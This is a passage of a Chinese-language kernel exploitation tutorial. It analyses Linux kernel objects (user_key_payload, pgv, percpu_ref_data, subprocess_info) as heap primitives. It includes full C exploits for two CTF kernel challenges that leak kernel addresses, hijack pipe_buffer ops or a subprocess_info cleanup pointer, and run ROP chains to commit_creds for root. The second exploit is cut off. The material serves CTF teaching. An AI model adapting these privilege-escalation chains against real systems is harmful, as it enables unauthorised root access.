return ret;
}

key_update() 中会调用 key->type->preparse(&prep) 分配新 payload 空间并进行数据拷贝,之后调用 key->type->update(key, &prep) 更新 payload 并释放旧的 payload ,最后调用 key->type->free_preparse(&prep) 来了一个“假动作”。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
int key_update(key_ref_t key_ref, const void *payload, size_t plen)
{
//...

memset(&prep, 0, sizeof(prep));
prep.data = payload;
prep.datalen = plen;
prep.quotalen = key->type->def_datalen;
prep.expiry = TIME64_MAX;
if (key->type->preparse) {
ret = key->type->preparse(&prep);

//...

ret = key->type->update(key, &prep);

//...

if (key->type->preparse)
key->type->free_preparse(&prep);
return ret;
}

对于 type 为 "user" 而言 preparse 指针应当为 user_preparse,这个函数前面分析过,其会为我们的 payload 再分配一个带有一个 user_key_payload 结构体作为头部的对象来保存我们传入的 payload ,分配 flag 为 GFP_KERNEL

对于 type 为 "user" 而言 update 指针应当为 user_update,主要就是将新的 payload 给到 key,调用 user_free_payload_rcu() 释放旧的 payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
int user_update(struct key *key, struct key_preparsed_payload *prep)
{
struct user_key_payload *zap = NULL;
int ret;

/* check the quota and attach the new data */
ret = key_payload_reserve(key, prep->datalen);
if (ret < 0)
return ret;

/* attach the new data, displacing the old */
key->expiry = prep->expiry;
if (key_is_positive(key))
zap = dereference_key_locked(key);
rcu_assign_keypointer(key, prep->payload.data[0]);
prep->payload.data[0] = NULL;

if (zap)
call_rcu(&zap->rcu, user_free_payload_rcu);
return ret;
}

对于 type 为 "user" 而言 free_preparse 指针应当为 user_free_preparse,这里只是一个简单的释放操作,但传入的参数 prep->payload.data[0]user_update 中已经被设为 NULL,所以这一步并没有实际作用。

1
2
3
4
5
6
7
/*
* Free a preparse of a user defined key payload
*/
void user_free_preparse(struct key_preparsed_payload *prep)
{
kfree_sensitive(prep->payload.data[0]);
}

KEYCTL_READ - 读取 payload 内容

该选项对应调用的是 keyctl_read_key(),首先会先分配一个临时对象,之后调用 __keyctl_read_key()payload 拷贝到临时对象上,最后从临时对象上拷贝数据到用户空间后释放该临时对象:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
long keyctl_read_key(key_serial_t keyid, char __user *buffer, size_t buflen)
{
//...

key_data_len = (buflen <= PAGE_SIZE) ? buflen : 0;
for (;;) {
if (key_data_len) {
key_data = kvmalloc(key_data_len, GFP_KERNEL);
if (!key_data) {
ret = -ENOMEM;
goto key_put_out;
}
}

ret = __keyctl_read_key(key, key_data, key_data_len);

//...

/* payload 大于一张内存页,重新分配空间 */
if (ret > key_data_len) {
if (unlikely(key_data))
kvfree_sensitive(key_data, key_data_len);
key_data_len = ret;
continue; /* Allocate buffer */
}

if (copy_to_user(buffer, key_data, ret))
ret = -EFAULT;
}
kvfree_sensitive(key_data, key_data_len);
//...

__keyctl_read_key() 的主要逻辑便是调用 key->type->read(key, buffer, buflen);,对于 type 为 "user" 而言应当为 user_read(),本质上就是一个 memcpy()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
long user_read(const struct key *key, char *buffer, size_t buflen)
{
const struct user_key_payload *upayload;
long ret;

upayload = user_key_payload_locked(key);
ret = upayload->datalen;

/* we can return the data as is */
if (buffer && buflen > 0) {
if (buflen > upayload->datalen)
buflen = upayload->datalen;

memcpy(buffer, upayload->data, buflen);
}

return ret;
}

数据泄露

这里我们可以注意到其拷贝的数据长度限制为 payload->datalen,如果我们能够用某种方式更改 payload 头部的 datalen 为一个更大值,便能完成内核空间中的越界读取,同时由于其使用先分配一个 buflen/datalen 长度的临时对象进行数据拷贝后再将临时对象上数据拷贝到用户空间的方式,因此不会触发 hardened usercopy 的检查(需要看具体版本实现)。

该选项对应调用的是 keyctl_keyring_unlink() ,其最后会调用到 key_unlink() 进行资源的释放:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int key_unlink(struct key *keyring, struct key *key)
{
struct assoc_array_edit *edit = NULL;
int ret;

key_check(keyring);
key_check(key);

ret = __key_unlink_lock(keyring);
if (ret < 0)
return ret;

ret = __key_unlink_begin(keyring, key, &edit);
if (ret == 0)
__key_unlink(keyring, key, &edit);
__key_unlink_end(keyring, key, edit);
return ret;
}

例题:RWCTF2023体验赛-Digging_into_kernel_3

附件下载链接

有一个无限的 free 功能和一个 kmalloc + 写 的功能。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
if ( a2 == 0xC0DECAFE )
{
if ( !copy_from_user(&input, a3, 16LL) && input.index <= 1u )
kfree(buf[input.index]);
return 0LL;
}
v3 = -1LL;
if ( a2 == 0xDEADBEEF )
{
if ( copy_from_user(&input, a3, 16LL) )
return 0LL;
index = (unsigned int)input.index;
if ( input.index > 1u )
return 0LL;
buf[index] = _kmalloc((unsigned int)input.size, 0xDC0LL);
v6 = buf[input.index];
if ( !v6 )
return 0LL;
if ( (unsigned int)input.size > 0x7FFFFFFFuLL )
BUG();
if ( copy_from_user(v6, input.buf, (unsigned int)input.size) )
return 0LL;
}

由于 keydescription 限制大,因此我们只使用它的 payload 部分。并且为了避免 description 对利用造成影响,整个利用过程中 description 大小不能和相关的 object 有交集。

首先堆风水申请两个相邻的 user_key_payload 然后改大前一个 user_key_payloaddatalen 并释放后一个 user_key_payload 。由于 user_key_payload.rcu.func 在释放时会写入内核地址,因此我们可以越界读前一个 user_key_payload 泄露内核地址。

之后我们使用 pipe_inode_info + pipe_buffer 劫持程序流实现提权。

首先我们堆风水使得一个我们可控的 pipe_inode_info 大小的 object 被 user_key_payload 使用。然后释放这个 object 以及一个 pipe_buffer 大小的 object。

创建一个 pipe 使得这两个object 被 pipe_inode_infopipe_buffer 使用,此时我们可以通过读取 user_key_payload 获取 pipe_buffer 的地址。这里由于 user_key_payloaddatalenpipe_inode_info 改为了 0xFFFF 因此我们需要让 key_read 传入的 buflen 足够长才能读取出数据。

之后在劫持的 pipe_buffer 上伪造 pipe_buf_operations 并且写入 rop 提权。这里我们用到的 gadget 如下:

1
2
3
4
5
6
7
8
9
10
11
.text:FFFFFFFF81250C9D push    rsi
.text:FFFFFFFF81250C9E pop rsp
.text:FFFFFFFF81250C9F cmp rcx, rdx
.text:FFFFFFFF81250CA2 jb short loc_FFFFFFFF81250C85
.text:FFFFFFFF81250CA4 pop rbx
.text:FFFFFFFF81250CA5 xor eax, eax
.text:FFFFFFFF81250CA7 pop rbp
.text:FFFFFFFF81250CA8 pop r12
.text:FFFFFFFF81250CAA jmp __x86_return_thunk
...
.text:FFFFFFFF82003240 retn
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include<ctype.h>

void bind_core(int core) {
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

void qword_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("[*] %s:\n", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}

void get_shell() { system("cat flag;/bin/sh"); }

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("[*] status has been saved.");
}

struct callback_head {
struct callback_head *next;

void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));

#define rcu_head callback_head
#define __aligned(x) __attribute__((__aligned__(x)))
typedef unsigned long long u64;

struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[0] __aligned(__alignof__(u64)); /* actual data */
};

int key_alloc(void *description, void *payload, int payload_len) {
return syscall(__NR_add_key, "user", description, payload, payload_len, KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int keyid, void *payload, size_t plen) {
return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}

int key_read(int keyid, void *buffer, size_t buflen) {
return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}

int key_revoke(int keyid) {
return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}

int key_unlink(int keyid) {
return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

struct node {
u_int32_t index;
u_int32_t size;
void *buf;
};

int rwctf_fd;

void alloc(u_int32_t index, u_int32_t size, void *buf) {
ioctl(rwctf_fd, 0xDEADBEEF, &(struct node) {index, size, buf});
}

void delete(u_int32_t index) {
ioctl(rwctf_fd, 0xC0DECAFE, &(struct node) {.index=index});
}


#define PIPE_INODE_INFO_SIZE 192
#define PIPE_BUFFER_SIZE 1024
#define USER_KEY_PAYLOAD_SIZE 0x40

size_t push_rsi_pop_rsp_pop_rbx_pop_rbp_pop_r12_ret = 0xffffffff81250c9d;
size_t pop_rdi_ret = 0xffffffff8106ab4d;
size_t init_cred = 0xFFFFFFFF82850580;
size_t commit_creds = 0xFFFFFFFF81095C30;
size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81E00ED0;


int main() {
bind_core(0);
save_status();
rwctf_fd = open("/dev/rwctf", O_RDWR);
if (rwctf_fd < 0) {
puts("[-] Failed to open rwctf.");
exit(-1);
}

size_t *buf = (size_t *) mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
memset(buf, 0, 0x4000);

alloc(0, USER_KEY_PAYLOAD_SIZE, buf);
alloc(1, USER_KEY_PAYLOAD_SIZE, buf);
delete(1);
delete(0);

size_t key_payload_data_size = USER_KEY_PAYLOAD_SIZE - sizeof(struct user_key_payload);
memset(buf, 'a', key_payload_data_size);
int key_id0 = key_alloc("0", buf, key_payload_data_size);
memset(buf, 'b', key_payload_data_size);
int key_id1 = key_alloc("1", buf, key_payload_data_size);

delete(1);
memset(((struct user_key_payload *) buf)->data, 'c', key_payload_data_size);
size_t key_payload_oob_size = key_payload_data_size + USER_KEY_PAYLOAD_SIZE;
((struct user_key_payload *) buf)->datalen = key_payload_oob_size;
alloc(0, USER_KEY_PAYLOAD_SIZE, buf);

key_revoke(key_id1);
printf("[*] key read length: %p\n", key_read(key_id0, buf, key_payload_oob_size));
qword_dump("leak kernel address from user_key_payload.rcu.head", buf, key_payload_oob_size);
size_t kernel_offset = buf[6] - 0xffffffff813d8210;
printf("[+] kernel offset: %p\n", kernel_offset);

push_rsi_pop_rsp_pop_rbx_pop_rbp_pop_r12_ret += kernel_offset;
pop_rdi_ret += kernel_offset;
init_cred += kernel_offset;
commit_creds += kernel_offset;
swapgs_restore_regs_and_return_to_usermode += kernel_offset;


alloc(0, PIPE_INODE_INFO_SIZE, buf);
alloc(1, PIPE_INODE_INFO_SIZE, buf);
delete(1);
delete(0);

int pipe_key_id = key_alloc("pipe", buf, PIPE_INODE_INFO_SIZE - sizeof(struct user_key_payload));
delete(1);// pipe_inode_info pipe_key_id
alloc(0, PIPE_BUFFER_SIZE, buf);
delete(0);// pipe_buffer

int pipe_fd[2];
pipe(pipe_fd);
key_payload_data_size = PIPE_INODE_INFO_SIZE - sizeof(struct user_key_payload);
printf("[*] key read length: %p\n", key_read(pipe_key_id, buf, -1));
qword_dump("get pip_buffer addr from pipe_inode_info", buf, key_payload_data_size);

size_t pipe_buffer_addr = buf[16];
printf("[+] pipe_buf addr: %p\n", pipe_buffer_addr);
((struct pipe_buffer *) buf)->ops = (void *) (pipe_buffer_addr + 0x100);
((struct pipe_buf_operations *) (((char *) buf) + 0x100))->release = (void *) push_rsi_pop_rsp_pop_rbx_pop_rbp_pop_r12_ret;

int rop_idx = 0;
size_t *rop = &buf[3];
rop[rop_idx++] = pop_rdi_ret;
rop[rop_idx++] = init_cred;
rop[rop_idx++] = commit_creds;
rop[rop_idx++] = swapgs_restore_regs_and_return_to_usermode + 0x31;
rop[rop_idx++] = 0;
rop[rop_idx++] = 0;
rop[rop_idx++] = 114514;
rop[rop_idx++] = user_cs;
rop[rop_idx++] = user_rflags;
rop[rop_idx++] = user_sp;
rop[rop_idx++] = user_ss;
signal(SIGSEGV, get_shell);

delete(0);
alloc(0, PIPE_BUFFER_SIZE, buf);

close(pipe_fd[0]);
close(pipe_fd[1]);

return 0;
}

pgv 与页级内存页分配

内核网络协议栈中有很多值得深挖的结构体,其中 ring buffer 相关的 packet_ring_bufferpgv 结构体可以帮我们完成页级的内存分配 & 释放。

packet_ring_buffer :PF_PACKET 模式下的 ring buffer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
struct packet_ring_buffer {
struct pgv *pg_vec;

unsigned int head;
unsigned int frames_per_block;
unsigned int frame_size;
unsigned int frame_max;

unsigned int pg_vec_order;
unsigned int pg_vec_pages;
unsigned int pg_vec_len;

unsigned int __percpu *pending_refcnt;

union {
unsigned long *rx_owner_map;
struct tpacket_kbdq_core prb_bdqc;
};
};

pgv:页级内存分配

pgv 结构体的定义比较简单,其实就是一个指向一块内存的指针

1
2
3
struct pgv {
char *buffer;
};

在实际使用时实际上是先分配该结构体的数组,再分配对应的页级内存

分配(GFP_KERNEL) & 页级内存分配

当我们创建一个 protocol 为 PF_PACKET 的 socket 之后,其函数表为 packet_ops,接下来我们先调用 setsockopt()PACKET_VERSION 设为 TPACKET_V1 / TPACKET_V2,再调用 setsockopt() 提交一个 PACKET_TX_RING ,此时便存在如下调用链:

1
2
3
4
5
__sys_setsockopt()
sock->ops->setsockopt() // packet_ops
packet_setsockopt() // case PACKET_TX_RING ↓
packet_set_ring()
alloc_pg_vec()

alloc_pg_vec() 中会创建一个 pgv 结构体,用以分配 tp_block_nr2order2^{\text{order}} 张内存页,其中 ordertp_block_size 决定:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}

alloc_one_pg_vec_page() 中会直接调用 __get_free_pages() 向 buddy system 请求内存页,因此我们可以利用该函数进行大量的页面请求:

1
2
3
4
5
6
7
8
9
10
11
static char *alloc_one_pg_vec_page(unsigned long order)
{
char *buffer;
gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
__GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;
//...
}

释放

相对地,pgv 中的页面会在 socket 被关闭后释放,由此我们便有了一个页级内存的分配/释放原语

使用限制

需要注意的是低权限用户无法创建一个类型为 SOCK_RAW 协议为 PF_PACKET 的 socket,但是我们可以通过开辟新的命名空间来绕过该限制,不过这样也有一定的缺陷:我们的进程也被隔离到该进程里了,无法获得“真正的 root 权限”

因此我们最好的做法便是开辟一个子进程,在该子进程中开辟新命名空间专门进行堆喷,父进程/其他子进程用于提权,通过管道与该子进程进行交互。

percpu_ref_data(kmalloc-64|GFP_KERNEL)

percpu_ref_data 包含两种有用的指针,其中 release 可以泄露内核基址(io_uring 已经整合到了内核中,io_ring_ctx_ref_free()io_rsrc_node_ref_zero() 地址可以用于计算内核基址),ref 可以泄露 physmap 基址。

1
2
3
4
5
6
7
8
9
struct percpu_ref_data {
atomic_long_t count;
percpu_ref_func_t *release; // 内核基址
percpu_ref_func_t *confirm_switch;// 内核基址
bool force_atomic:1;
bool allow_reinit:1;
struct rcu_head rcu;
struct percpu_ref *ref; // physmap 地址
};

该对象在 io_ring_ctx_alloc() -> percpu_ref_init() 函数中分配,用户可以使用 io_uring_setup 系统调用来触发执行该函数(在初始化 io_ring_ctx 对象时调用该函数),调用 close 可以释放该对象。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
int percpu_ref_init(struct percpu_ref *ref, percpu_ref_func_t *release,
unsigned int flags, gfp_t gfp)
{
struct percpu_ref_data *data;

...

data = kzalloc(sizeof(*ref->data), gfp); // alloc

...

data->release = release;
data->confirm_switch = NULL;
data->ref = ref;
ref->data = data;
return 0;
}

static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
{
struct io_ring_ctx *ctx;

...

if (percpu_ref_init(&ctx->refs, io_ring_ctx_ref_free, // <-----------
PERCPU_REF_ALLOW_REINIT, GFP_KERNEL))
goto err;

...
}

subprocess_info 与套接字相关

subprocess_info:kmalloc-128

定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
struct work_struct {
atomic_long_t data;
struct list_head entry;
work_func_t func;
#ifdef CONFIG_LOCKDEP
struct lockdep_map lockdep_map;
#endif
};

struct subprocess_info {
struct work_struct work;
struct completion *complete;
const char *path;
char **argv;
char **envp;
struct file *file;
int wait;
int retval;
pid_t pid;
int (*init)(struct subprocess_info *info, struct cred *new);
void (*cleanup)(struct subprocess_info *info);
void *data;
} __randomize_layout;

分配/释放

当我们尝试创建一个未知协议(socket(22, AF_INET, 0))时,便会创建一个 subprocess_info 结构体,对应地,在系统调用结束之后该结构体便会被立即释放,过程其实有点类似 setxattr,不同的是没有任何用户空间数据会被拷贝至内核空间。

因为该结构体在创建之后就会被释放掉,因此基于该结构体的利用都要用到条件竞争。

数据泄露(条件竞争)

  • 内核 .text 段地址

    该结构体的 work.func 可能指向 call_usermodehelper_exec_work,若是我们能利用条件竞争读出该指针便能泄露出内核的 .text 段的基址。

劫持内核执行流(条件竞争)

在释放该结构体时会调用其 cleanup 指针成员,若是我们能够在创建该结构体之后、释放该结构体之前劫持该指针便能控制内核执行流,但是这个竞争窗口比较小,因此实际上我们很难利用这种方式完成利用。
在这里插入图片描述

例题:SCTF2022 - flying_kernel

附件下载链接

存在 UAF 和 格式化字符串漏洞,object 属于 kmalloc-128

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
__int64 __fastcall seven_ioctl(__int64 a1, int a2, __int64 a3)
{
switch ( a2 )
{
case 0x6666:
if ( sctf_buf )
{
kfree(sctf_buf);
return 0LL;
}
else
{
printk("What are you doing?");
return -1LL;
}
case 0x7777:
if ( sctf_buf )
printk(sctf_buf);
return 0LL;
case 0x5555:
if ( a3 == 0x80 )
{
sctf_buf = kmem_cache_alloc_trace(kmalloc_caches[7], 0xCC0LL);
printk("Add Success!\n");
}
else
{
printk("It's not that simple\n");
}
return 0LL;
default:
return -1LL;
}
}

由于题目中 qemu 的启动参数未配置 quiet ,可以看到内核的日志信息。因此我们可以通过格式化字符串漏洞泄露内核基址。

利用格式化字符串漏洞的输入为 %llx %llx %llx %llx %llx %llx %llx %llx %llx %llx %llx %llx ,注意这里不能使用%p,否则内核会检测到信息泄漏,得不到正确的结果。

不过我们也可以通过 user_key_payload + subprocess_info 泄露内核基址,由于创建 user_key_payload 时第一次申请的 user_key_payload 会被释放掉,因此需要借助 msg_msg 进行堆风水使得 user_key_payloadsubprocess_info 使用同一个 object 。

之后竞争修改 subprocess_infocleanup 指针劫持内核执行流。由于没有开 SMAP 保护,因此可以将栈迁移到用户空间的 ROP 上进行提权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/keyctl.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/sysinfo.h>

int randint(int min, int max) {
return min + (rand() % (max - min));
}

void bind_core(bool fixed, bool thread) {
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(fixed ? 0 : randint(1, get_nprocs()), &cpu_set);
if (thread) {
pthread_setaffinity_np(pthread_self(), sizeof(cpu_set), &cpu_set);
} else {
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}
}

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("[*] status has been saved.");
}

void qword_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("[*] %s:\n", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}

struct list_head {
struct list_head *next, *prev;
};

/* one msg_msg structure for each message */
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
void *next; /* struct msg_msgseg *next; */
void *security; /* NULL without SELinux */
/* the actual message follows immediately */
};

struct msg_msgseg {
struct msg_msgseg *next;
/* the next part of the message follows immediately */
};

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

#define PAGE_SIZE 0x1000
#define DATALEN_MSG ((size_t)PAGE_SIZE-sizeof(struct msg_msg))
#define DATALEN_SEG ((size_t)PAGE_SIZE-sizeof(struct msg_msgseg))

int get_msg_queue(void) {
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

long read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
((struct msgbuf *) msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

long peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(void *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security) {
((struct msg_msg *) msg)->m_list.next = (void *) m_list_next;
((struct msg_msg *) msg)->m_list.prev = (void *) m_list_prev;
((struct msg_msg *) msg)->m_type = (long) m_type;
((struct msg_msg *) msg)->m_ts = m_ts;
((struct msg_msg *) msg)->next = (void *) next;
((struct msg_msg *) msg)->security = (void *) security;
}

struct callback_head {
struct callback_head *next;

void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));

#define rcu_head callback_head
#define __aligned(x) __attribute__((__aligned__(x)))
typedef unsigned long long u64;

struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[0] __aligned(__alignof__(u64)); /* actual data */
};

#define KEY_NUM 199
int key_id[KEY_NUM];

int key_alloc(int id, void *payload, int payload_len) {
char description[0x10] = {};
sprintf(description, "%d", id);
return key_id[id] = syscall(__NR_add_key, "user", description, payload, payload_len - sizeof(struct user_key_payload), KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int id, void *payload, size_t plen) {
return syscall(__NR_keyctl, KEYCTL_UPDATE, key_id[id], payload, plen);
}

int key_read(int id, void *bufer, size_t buflen) {
return syscall(__NR_keyctl, KEYCTL_READ, key_id[id], bufer, buflen);
}

int key_revoke(int id) {
return syscall(__NR_keyctl, KEYCTL_REVOKE, key_id[id], 0, 0, 0);
}

int key_unlink(int id) {
return syscall(__NR_keyctl, KEYCTL_UNLINK, key_id[id], KEY_SPEC_PROCESS_KEYRING);
}

#define OBJ_SIZE 0x80
int seven_fd;

void object_alloc() {
ioctl(seven_fd, 0x5555, 0x80);
}

void object_delete() {
ioctl(seven_fd, 0x6666, 0);
}

void object_show() {
ioctl(seven_fd, 0x7777, 0);
}

struct {
long mtype;
char mtext[OBJ_SIZE - sizeof(struct msg_msg)];
} msgbuf;

size_t commit_creds = 0xffffffff8108c360;
size_t pop_rdi_ret = 0xffffffff811884e7;
size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81C00DF0;
size_t prepare_kernel_cred = 0xffffffff8108c780;
size_t mov_rdi_rax_rep_ret = 0xffffffff81aed04b;
size_t pop_rcx_ret = 0xffffffff8101ed83;
size_t xchg_esp_eax_ret = 0xffffffff81011cb0;

bool success = false;

void get_shell(void) {
success = true;
char *args[] = {"/bin/sh", "-i", NULL};
execve(args[0], args, NULL);
}

void *edit_subprocess_info() {
char *buf = malloc(0x20);
*(size_t *) buf = xchg_esp_eax_ret;
while (!success) {
write(seven_fd, buf, 0x20);
}
}

int main() {
bind_core(true, false);
signal(SIGSEGV, (void *) get_shell);
save_status();

seven_fd = open("/dev/seven", O_RDWR);
if (seven_fd < 0) {
perror("[-] failed to open seven.");
exit(-1);
}
char *buf = (char *) mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
int msqid = get_msg_queue();
write_msg(msqid, &msgbuf, sizeof(msgbuf.mtext), 1);
object_alloc();
object_delete();
read_msg(msqid, &msgbuf, sizeof msgbuf.mtext, 1);
key_alloc(0, buf, 0x80);
object_delete();
socket(22, AF_INET, 0);
printf("[*] key read len: %d\n", key_read(0, buf, -1));
qword_dump("leak kernel addr from subprocess_info", buf, 0x100);
size_t kernel_offset = *(size_t *) buf - 0xffffffff8107e910;
